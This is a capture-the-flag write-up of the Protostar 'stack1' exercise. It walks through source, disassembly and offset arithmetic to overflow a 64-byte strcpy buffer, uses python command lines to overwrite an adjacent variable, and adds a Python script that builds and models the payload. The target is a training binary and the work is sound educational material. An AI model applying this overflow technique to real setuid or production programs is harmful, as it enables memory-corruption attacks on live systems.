protostar - stack 1

Let's check the file type of our binary using the file command:

$ file stack1
stack1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

Let's try running it:

$ ./stack1
stack1: please specify an argument

$ ./stack1 monish
Try again, you got 0x00000000

It seems we have to overflow the buffer so that some variable ends up with a particular value.

Let's view the source code for a proper understanding:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>      /* errx(); missing from the original listing */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

We need to overwrite the modified variable with 0x61626364. The program copies argv[1] into the 64-byte buffer with strcpy, which does no bounds checking, so an argument longer than 64 bytes runs past buffer into whatever the compiler placed after it.

Let's use our debugger to analyse the stack layout.

Disassembling main():

(gdb) disas main
Dump of assembler code for function main:
0x08048464 <main+0>:	push   ebp
0x08048465 <main+1>:	mov    ebp,esp
0x08048467 <main+3>:	and    esp,0xfffffff0
0x0804846a <main+6>:	sub    esp,0x60
0x0804846d <main+9>:	cmp    DWORD PTR [ebp+0x8],0x1
0x08048471 <main+13>:	jne    0x8048487 <main+35>
0x08048473 <main+15>:	mov    DWORD PTR [esp+0x4],0x80485a0
0x0804847b <main+23>:	mov    DWORD PTR [esp],0x1
0x08048482 <main+30>:	call   0x8048388 <errx@plt>
0x08048487 <main+35>:	mov    DWORD PTR [esp+0x5c],0x0
0x0804848f <main+43>:	mov    eax,DWORD PTR [ebp+0xc]
0x08048492 <main+46>:	add    eax,0x4
0x08048495 <main+49>:	mov    eax,DWORD PTR [eax]
0x08048497 <main+51>:	mov    DWORD PTR [esp+0x4],eax
0x0804849b <main+55>:	lea    eax,[esp+0x1c]
0x0804849f <main+59>:	mov    DWORD PTR [esp],eax
0x080484a2 <main+62>:	call   0x8048368 <strcpy@plt>
0x080484a7 <main+67>:	mov    eax,DWORD PTR [esp+0x5c]
0x080484ab <main+71>:	cmp    eax,0x61626364
0x080484b0 <main+76>:	jne    0x80484c0 <main+92>
0x080484b2 <main+78>:	mov    DWORD PTR [esp],0x80485bc
0x080484b9 <main+85>:	call   0x8048398 <puts@plt>
0x080484be <main+90>:	jmp    0x80484d5 <main+113>
0x080484c0 <main+92>:	mov    edx,DWORD PTR [esp+0x5c]
0x080484c4 <main+96>:	mov    eax,0x80485f3
0x080484c9 <main+101>:	mov    DWORD PTR [esp+0x4],edx
0x080484cd <main+105>:	mov    DWORD PTR [esp],eax
0x080484d0 <main+108>:	call   0x8048378 <printf@plt>
0x080484d5 <main+113>:	leave
0x080484d6 <main+114>:	ret

Here modified is set to 0; it lives at esp+0x5c:

0x08048487 <main+35>:	mov    DWORD PTR [esp+0x5c],0x0

Here the address of buffer, esp+0x1c, is loaded into eax as the destination argument for strcpy:

0x0804849b <main+55>:	lea    eax,[esp+0x1c]

In order to overwrite modified we need the distance between them:

>>> print(0x5c-0x1c)
64

So buffer's 64 bytes end exactly where modified begins, and the 65th byte of the argument is the first byte of modified.

Passing 64 bytes of junk fills buffer exactly; strcpy's terminating NUL lands in the first byte of modified, which was already 0:

$ ./stack1 $(python -c "print('A'*64)")
Try again, you got 0x00000000

Four more bytes spill into modified:

$ ./stack1 $(python -c "print('A'*64+'BBBB')")
Try again, you got 0x42424242

We have overwritten modified with our junk BBBB (0x42 is ASCII 'B').

Now write the required value. x86 is little-endian, so 0x61626364 has to be supplied least-significant byte first, \x64\x63\x62\x61, which is simply the ASCII string dcba:

$ ./stack1 $(python -c "print('A'*64+'\x64\x63\x62\x61')")
you have correctly got the variable to the right value
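To make the offset arithmetic and the byte ordering explicit, here is an added example (it is not part of the original writeup and not Protostar code). It builds the payload from the constants read off the disassembly above (sub esp,0x60; buffer at esp+0x1c; modified at esp+0x5c), models strcpy into that frame, and reads back what modified would hold. The 16 bytes of slack above the frame are an assumption so the NUL that strcpy appends has somewhere to land in the model; the refusal of values containing a NUL byte shows the limit of delivering a value through strcpy.

```python
import struct

# Frame layout read from the stack1 disassembly (sub esp,0x60; buffer at
# esp+0x1c; modified at esp+0x5c).  Nothing else about the binary is assumed.
FRAME_SIZE = 0x60
BUFFER_OFF = 0x1c
MODIFIED_OFF = 0x5c
TARGET = 0x61626364
# Assumed slack above the frame (saved ebp / return address / padding) so the
# terminating NUL has a place to land in the model.
SLACK = 16


def offset_to_modified():
    """Bytes from the start of buffer to the start of modified."""
    return MODIFIED_OFF - BUFFER_OFF


def build_payload(value, offset=None):
    """Junk up to modified, then value as a little-endian dword.

    strcpy stops at the first NUL, so a value containing a zero byte cannot
    be delivered this way; refuse it rather than silently truncating.
    """
    if offset is None:
        offset = offset_to_modified()
    tail = struct.pack('<I', value)
    if b'\x00' in tail:
        raise ValueError('0x%08x contains a NUL byte; strcpy would stop early' % value)
    return b'A' * offset + tail


def simulate_strcpy(argv1):
    """Model strcpy(buffer, argv1) on the frame and return what modified reads as.

    modified is set to 0 before the copy, so the frame starts zeroed.
    """
    frame = bytearray(FRAME_SIZE + SLACK)
    # strcpy copies up to and including the first NUL.
    data = argv1.split(b'\x00', 1)[0] + b'\x00'
    end = BUFFER_OFF + len(data)
    if end > len(frame):
        raise ValueError('argument of %d bytes runs past the modelled frame' % len(argv1))
    frame[BUFFER_OFF:end] = data
    return struct.unpack_from('<I', frame, MODIFIED_OFF)[0]


if __name__ == '__main__':
    off = offset_to_modified()
    for arg in (b'A' * off, b'A' * off + b'BBBB', b'A' * (off + 1), build_payload(TARGET)):
        print('%3d bytes -> modified = 0x%08x' % (len(arg), simulate_strcpy(arg)))
```

The 65-byte case is worth noting: a single extra 'A' gives modified = 0x00000041, because only its lowest-addressed (least-significant) byte was overwritten and the NUL from strcpy zeroed the next one.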

Done! We have completed “stack1”.